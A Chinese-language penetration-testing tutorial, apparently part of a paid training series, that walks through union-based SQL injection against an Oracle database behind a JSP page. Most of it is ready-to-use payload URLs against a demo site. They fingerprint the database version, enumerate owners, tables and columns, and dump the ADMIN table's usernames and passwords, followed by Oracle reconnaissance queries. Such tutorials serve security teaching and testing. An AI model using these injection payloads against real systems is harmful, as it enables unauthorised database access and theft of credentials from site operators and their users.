[原创]WEB安全第四章SQL注入篇16 oracle+jsp联合查询注入
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
WEB安全第四章SQL注入篇16 oracle+jsp联合查询注入
1、注释符号
- — 空格 单行注释
- /* */ 多行注释
2、判断是否注入
and 1=1 —
and 1=2 —
3、列数
order by
http://www.jsporcle.com/a.jsp?username=SMITH’ order by 8 –
4、联合查询
因为oracle 对列的类型比较严谨 所以 要用null 可以匹配任意类型
Oracle中的dual表是一个单行单列的虚拟表
Dual 是 Oracle中的一个实际存在的表,任何用户均可读取。
所以可以通过这个dual表 来显示列数。
http://www.jsporcle.com/a.jsp?username=SMITH%27 union select null,null,null,null,null,null,null,null from dual —
5、获取Oracle信息
oracle 版本信息
http://www.jsporcle.com/a.jsp?username=SMITH’ union select null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null from dual –
![[原创]WEB安全第四章SQL注入篇16 oracle+jsp联合查询注入](https://www.moonsec.com/wp-content/uploads/2019/11/image001.png)
![[原创]WEB安全第四章SQL注入篇16 oracle+jsp联合查询注入](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
1 当前用户权限 (select * from session_roles)
2 当前数据库版本 ( select banner from sys.v_$version where rownum=1)
3 服务器出口IP (用utl_http.request 可以实现)
4 服务器监听IP (select utl_inaddr.get_host_address from dual)
5 服务器操作系统 (select member from v$logfile where rownum=1)
6 服务器sid (select instance_name from v$instance)
7 当前连接用户 (select SYS_CONTEXT (‘USERENV’, ‘CURRENT_USER’) from dual)
6当前用户 (SELECT user FROM dual)
6、查询库名
http://www.jsporcle.com/a.jsp?username=99%27 union select null,null,(select owner from all_tables where rownum=1),null,null,null,null,null from dual —
http://www.jsporcle.com/a.jsp?username=99%27 union select null,null,(select owner from all_tables where rownum=1 and owner <>’SYS’ ),null,null,null,null,null from dual —
7、查询表
表 一定要是大写的
查询第一个表
http://www.jsporcle.com/a.jsp?username=SMITH’ union select null,null,(select table_name from user_tables where rownum=1),null,null,null,null,null from dual —
![[原创]WEB安全第四章SQL注入篇16 oracle+jsp联合查询注入](https://www.moonsec.com/wp-content/uploads/2019/11/image002.png)
查询第二个表
http://www.jsporcle.com/a.jsp?username=SMITH’ union select null,null,(select table_name from user_tables where rownum=1 and table_name<>’ADMIN’),null,null,null,null,null from dual —
8、查询列
查询 表 ADMIN第一个列
http://www.jsporcle.com/a.jsp?username=SMITH’ union select null,(select column_name from user_tab_columns where table_name=’ADMIN’ and rownum=1),null,null,null,null,null,null from dual —
第二个列
http://www.jsporcle.com/a.jsp?username=SMITH’ union select null,(select column_name from user_tab_columns where table_name=’ADMIN’ and column_name<>’ID’ and rownum=1),null,null,null,null,null,null from dual —
查询表ADMIN 第三个列
http://www.jsporcle.com/a.jsp?username=SMITH’ union select null,(select column_name from user_tab_columns where table_name=’ADMIN’ and column_name<>’ID’ and column_name<>’USERNAME’ and rownum=1),null,null,null,null,null,null from dual —
ID USERNAME PASSWORD
9、查询数据
http://www.jsporcle.com/a.jsp?username=SMITH’ union select null,(SELECT CONCAT(USERNAME,PASSWORD) FROM ADMIN),null,null,null,null,null,null from dual —
![[原创]WEB安全第四章SQL注入篇16 oracle+jsp联合查询注入](https://www.moonsec.com/wp-content/uploads/2019/11/image003.png)
10、扩展
当前用户:
SELECT user FROM dual;
列出所有用户:
SELECT username FROM all_users ORDER BY username;
列出数据库
SELECT DISTINCT owner FROM all_tables;
列出表名:
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
查询表所有列
SELECT column_name FROM all_tab_columns WHERE TABLE_NAME=’ADMIN’;
定位文件
SELECT name FROM V$DATAFILE;
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/120.html
mOon 